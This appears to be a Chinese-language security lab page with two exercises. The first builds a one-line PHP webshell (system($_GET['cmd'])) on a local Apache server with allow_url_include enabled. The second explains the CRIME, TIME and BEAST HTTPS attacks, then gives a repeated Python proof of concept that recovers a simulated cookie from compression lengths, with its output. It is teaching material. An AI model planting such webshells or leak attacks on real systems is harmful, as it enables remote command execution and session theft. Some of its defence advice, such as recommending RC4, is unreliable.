web攻击

#!/usr/bin/python3
import string
import zlib
import sys
import random
  
charset = string.letters + string.digits
  
COOKIE = ''.join(random.choice(charset) for x in range(30))
  
HEADERS = ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret="+COOKIE+"\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n")
BODY =    ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret=")
cookie = ""
  
def compress(data):
  
    c = zlib.compressobj()
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def getposset(perchar,chars):
    posset = []
    baselen = len(compress(HEADERS+perchar))
    for i in chars:
        t = len(compress(HEADERS+ perchar+i))
        if (t<=baselen):
            posset += i
    return posset
def doguess():
    global cookie
    while len(cookie)<30:
        posset = getposset(BODY+cookie,charset)
        trun = 1
        tem_posset = posset
        while 1<len(posset):
            tem_body = BODY[trun:]
            posset = getposset(tem_body+cookie,tem_posset)
            trun = trun +1
        if len(posset)==0:
            return False
        cookie += posset[0]
        print (posset[0])
        return True
  
while BODY.find("\r\n")>=0:
    if not doguess():
        print ("(-)Changebody")
        BODY = BODY[BODY.find("\r\n") + 2:]
print ("(+)orign  cookie"+COOKIE)
print ("(+)Gotten cookie"+cookie)

文件存在
#!/usr/bin/python3 importstring importzlib importsys importrandom charset=string.letters+string.digits COOKIE=''.join(random.choice(charset)forxinrange(30)) HEADERS=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret="+COOKIE+"\r\n" "Accept-Encoding:gzip,deflate,sdch\r\n" "Accept-Language:en-US,en;q=0.8\r\n" "Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" "\r\n") BODY=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret=") cookie="" defcompress(data): c=zlib.compressobj() returnc.compress(data)+c.flush(zlib.Z_SYNC_FLUSH) defgetposset(perchar,chars): posset=[] baselen=len(compress(HEADERS+perchar)) foriinchars: t=len(compress(HEADERS+perchar+i)) if(t<=baselen): posset+=i returnposset defdoguess(): globalcookie whilelen(cookie)<30: posset=getposset(BODY+cookie,charset) trun=1 tem_posset=posset while1<len(posset): tem_body=BODY[trun:] posset=getposset(tem_body+cookie,tem_posset) trun=trun+1 iflen(posset)==0: returnFalse cookie+=posset[0] print(posset[0]) returnTrue whileBODY.find("\r\n")>=0: ifnotdoguess(): print("(-)Changebody") BODY=BODY[BODY.find("\r\n")+2:] print("(+)origncookie"+COOKIE) print("(+)Gottencookie"+cookie)
操作正确，评测通过!

1. #!/usr/bin/python3
2. import string
3. import zlib
4. import sys
5. import random
7. charset = string.letters + string.digits
9. COOKIE = ''.join(random.choice(charset) for x in range(30))
11. HEADERS = ("POST / HTTP/1.1\r\n"
12. "Host: thebankserver.com\r\n"
13. "Connection: keep-alive\r\n"
14. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
15. "Accept: */*\r\n"
16. "Referer: https://thebankserver.com/\r\n"
17. "Cookie: secret="+COOKIE+"\r\n"
18. "Accept-Encoding: gzip,deflate,sdch\r\n"
19. "Accept-Language: en-US,en;q=0.8\r\n"
20. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
21. "\r\n")
22. BODY = ("POST / HTTP/1.1\r\n"
23. "Host: thebankserver.com\r\n"
24. "Connection: keep-alive\r\n"
25. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
26. "Accept: */*\r\n"
27. "Referer: https://thebankserver.com/\r\n"
28. "Cookie: secret=")
29. cookie = ""
31. def compress(data):
33. c = zlib.compressobj()
34. return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
35. def getposset(perchar,chars):
36. posset = []
37. baselen = len(compress(HEADERS+perchar))
38. for i in chars:
39. t = len(compress(HEADERS+ perchar+i))
40. if (t<=baselen):
41. posset += i
42. return posset
43. def doguess():
44. global cookie
45. while len(cookie)<30:
46. posset = getposset(BODY+cookie,charset)
47. trun = 1
48. tem_posset = posset
49. while 1<len(posset):
50. tem_body = BODY[trun:]
51. posset = getposset(tem_body+cookie,tem_posset)
52. trun = trun +1
53. if len(posset)==0:
54. return False
55. cookie += posset[0]
56. print (posset[0])
57. return True
59. while BODY.find("\r\n")>=0:
60. if not doguess():
61. print ("(-)Changebody")
62. BODY = BODY[BODY.find("\r\n") + 2:]
63. print ("(+)orign cookie"+COOKIE)
64. print ("(+)Gotten cookie"+cookie)

任务描述

本关任务：了解Webshell

相关知识

为了完成本关任务，你需要掌握：

1.Webshell

Webshell

本质上是放置在服务器上的脚本文件，由于其调用了操作系统的一些函数，于是拥有了与shell 类似的功能。

实验步骤

完成Webshell实验

实验步骤一，安装http服务器

更新软件源

1. # apt-get update

安装apache http服务

1. # apt-get install apache2

实验步骤二，安装php

1. # apt-get install php
2. # apt-get install libapache2-mod-php
4. # vim /etc/php/7.0/apache2/php.ini
5. allow_url_include = On
7. # echo "ServerName localhost:80" >> /etc/apache2/apache2.conf

实验步骤三，创建一个简单的webshell界面

1. # cd /root
2. # touch test.php
3. # echo '<?php system($_GET['cmd']);?>' >> test.php

实验步骤四，将页面复制到Web服务器当中

1. # cp test.php /var/www/html
2. # service apache2 restart

实验步骤五，使用浏览器进行浏览 在网址栏输入：

1. http://127.0.0.1/test.php?cmd=ls

任务描述

本关任务：了解HTTPS攻击的方法

相关知识

为了完成本关任务，你需要掌握：

1.HTTPS攻击

HTTPS攻击

常见HTTPS攻击

1）CRIME攻击

​ 攻击原理

​ 攻击者控制受害者发送大量请求，利用压缩算法的机制猜测请求中的关键信息，根据response长度判断请求是否成功。

​ 攻击前提

​ 攻击者可以获取受害者的网络通信包。(中间人攻击，ISP供应商)

​ 浏览器和服务器支持均支持并使用压缩算法。

​ 攻击者可以控制受害者发送大量请求并可以控制请求内容。

​ 防御方法

​ 客户端可以升级浏览器来避免这种攻击。

1. • Chrome: 21.0.1180.89 and above
2. • Firefox: 15.0.1 and above
3. • Opera: 12.01 and above
4. • Safari: 5.1.7 and above

​ 服务器端可以通过禁用一些加密算法来防止此类攻击。

​ Apache

1. • SSLCompression flag = "SSLCompression off"
2. • GnuTLSPriorities flag = "!COMP-DEFLATE"

​ 禁止过于频繁的请求。

​ 修改压缩算法流程，用户输入的数据不进行压缩。

​ 随机添加长度不定的垃圾数据。

2）TIME攻击

​ 攻击原理

​ 攻击者控制受害者发送大量请求，利用压缩算法的机制猜测请求中的关键信息，根据response响应时间判断请求是否成功。其实TIME和CRIME一样都利用了压缩算法，只不过CRIME是通过长度信息作为辅助，而TIME是通过时间信息作为辅助。

​ 攻击前提

​ 攻击者可以控制受害者发送大量请求并可以控制请求内容。

​ 稳定的网络环境。

​ 防御方法

​ 在解密Response过程中加入随机的短时间延迟。

​ 阻止短时间内的频繁请求。

3）BEAST

​ 攻击原理

​ 攻击者控制受害者发送大量请求，利用CBC加密模式猜测关键信息。

​ 攻击前提

​ 攻击者可以获取受害者的网络通信包。(中间人攻击，ISP供应商)

​ 攻击者需要能得到发送敏感数据端的一部分权限。以便将自己的信息插入SSL/TLS会话中。

​ 攻击者需要准确的找出敏感数据的密文段。

​ 攻击这可以控制受害者发送大量请求并可以控制请求内容。

​ 防御方法

​ 使用RC4加密模式代替BCB加密模式。

​ 部署TLS 1.1或者更高级的版本，来避免SSL 3.0/TLS 1.0带来的安全问题。

​ 在服务端设置每传输固定字节，就改变一次加密秘钥。

实验步骤

完成HTTPS攻击实验

Python利用CRIME思路验证攻击可行性

实验步骤一，进入Python交互模式：

1. # cd /root
2. # python3
3. Python 3.6.9 (default, Jul 17 2020, 12:50:27)
4. [GCC 8.4.0] on linux
5. Type "help", "copyright", "credits" or "license" for more information.
6. >>>

实验步骤二，导入模块：

1. >>> import string
2. >>> import zlib
3. >>> import sys
4. >>> import random

实验步骤三，定义字符集：

1. >>> charset = string.ascii_letters + string.digits

实验步骤四，定义COOKIE：

1. >>> COOKIE = ''.join(random.choice(charset) for x in range(30))

实验步骤五，定义头部信息：

HEADERS = ("POST / HTTP/1.1\r\n"

"Host: thebankserver.com\r\n"

"Connection: keep-alive\r\n"

"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"

"Accept: */*\r\n"

"Referer: https://thebankserver.com/\\r\\n"

"Cookie: secret="+COOKIE+"\r\n"

"Accept-Encoding: gzip,deflate,sdch\r\n"

"Accept-Language: en-US,en;q=0.8\r\n"

"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"

"\r\n")

实验步骤六，定义BODY：

、

实验步骤七，定义cookie：

BODY = ("POST / HTTP/1.1\r\n"

"Host: thebankserver.com\r\n"

"Connection: keep-alive\r\n"

"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"

"Accept: */*\r\n"

"Referer: https://thebankserver.com/\\r\\n"

"Cookie: secret=")

1. >>> cookie = ""

实验步骤八，定义猜测方法：

1. >>> def compress(data):
2. ...
3. ... c = zlib.compressobj()
4. ... return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
6. >>> def getposset(perchar,chars):
7. ... posset = []
8. ... baselen = len(compress(HEADERS+perchar))
9. ... for i in chars:
10. ... t = len(compress(HEADERS+ perchar+i))
11. ... if (t<=baselen):
12. ... posset += i
13. ... return posset
15. >>> def doguess():
16. ... global cookie
17. ... while len(cookie)<30:
18. ... posset = getposset(BODY+cookie,charset)
19. ... trun = 1
20. ... tem_posset = posset
21. ... while 1<len(posset):
22. ... tem_body = BODY[trun:]
23. ... posset = getposset(tem_body+cookie,tem_posset)
24. ... trun = trun +1
25. ... if len(posset)==0:
26. ... return False
27. ... cookie += posset[0]
28. ... print(posset[0])
29. ... return True

实验步骤九，猜测循环体：

1. >>> while BODY.find("\r\n")>=0:
2. ... if not doguess():
3. ... print ("(-)Changebody")
4. ... BODY = BODY[BODY.find("\r\n") + 2:]

实验步骤十，编写输入代码：

1. >>> print("(+)orign cookie"+COOKIE)
2. >>> print("(+)Gotten cookie"+cookie)

实验步骤十一，将上述步骤编写为执行文件：

输入命令：

# vi /root/CRIME.py

输入内容：

1. #!/usr/bin/python3
2. import string
3. import zlib
4. import sys
5. import random
7. charset = string.letters + string.digits
9. COOKIE = ''.join(random.choice(charset) for x in range(30))
11. HEADERS = ("POST / HTTP/1.1\r\n"
12. "Host: thebankserver.com\r\n"
13. "Connection: keep-alive\r\n"
14. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
15. "Accept: */*\r\n"
16. "Referer: https://thebankserver.com/\r\n"
17. "Cookie: secret="+COOKIE+"\r\n"
18. "Accept-Encoding: gzip,deflate,sdch\r\n"
19. "Accept-Language: en-US,en;q=0.8\r\n"
20. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
21. "\r\n")
22. BODY = ("POST / HTTP/1.1\r\n"
23. "Host: thebankserver.com\r\n"
24. "Connection: keep-alive\r\n"
25. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
26. "Accept: */*\r\n"
27. "Referer: https://thebankserver.com/\r\n"
28. "Cookie: secret=")
29. cookie = ""
31. def compress(data):
33. c = zlib.compressobj()
34. return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
35. def getposset(perchar,chars):
36. posset = []
37. baselen = len(compress(HEADERS+perchar))
38. for i in chars:
39. t = len(compress(HEADERS+ perchar+i))
40. if (t<=baselen):
41. posset += i
42. return posset
43. def doguess():
44. global cookie
45. while len(cookie)<30:
46. posset = getposset(BODY+cookie,charset)
47. trun = 1
48. tem_posset = posset
49. while 1<len(posset):
50. tem_body = BODY[trun:]
51. posset = getposset(tem_body+cookie,tem_posset)
52. trun = trun +1
53. if len(posset)==0:
54. return False
55. cookie += posset[0]
56. print (posset[0])
57. return True
59. while BODY.find("\r\n")>=0:
60. if not doguess():
61. print ("(-)Changebody")
62. BODY = BODY[BODY.find("\r\n") + 2:]
63. print ("(+)orign cookie"+COOKIE)
64. print ("(+)Gotten cookie"+cookie)

1. # python CRIME.py
2. B
3. r
4. Z
5. c
6. M
7. 2
8. l
9. 4
10. s
11. 7
12. (-)Changebody
13. w
14. F
15. 9
16. K
17. 6
18. 8
19. E
20. w
21. E
22. P
23. t
24. W
25. a
26. U
27. (-)Changebody
28. i
29. E
30. N
31. 9
32. r
33. 1
34. (-)Changebody
35. (-)Changebody
36. (-)Changebody
37. (-)Changebody
38. (+)orign cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1
39. (+)Gotten cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1

将结果保存到文件中：

1. # python CRIME.py > /root/HTTPS.txt

任务：

完成实验。

---

开始你的任务吧，祝你成功！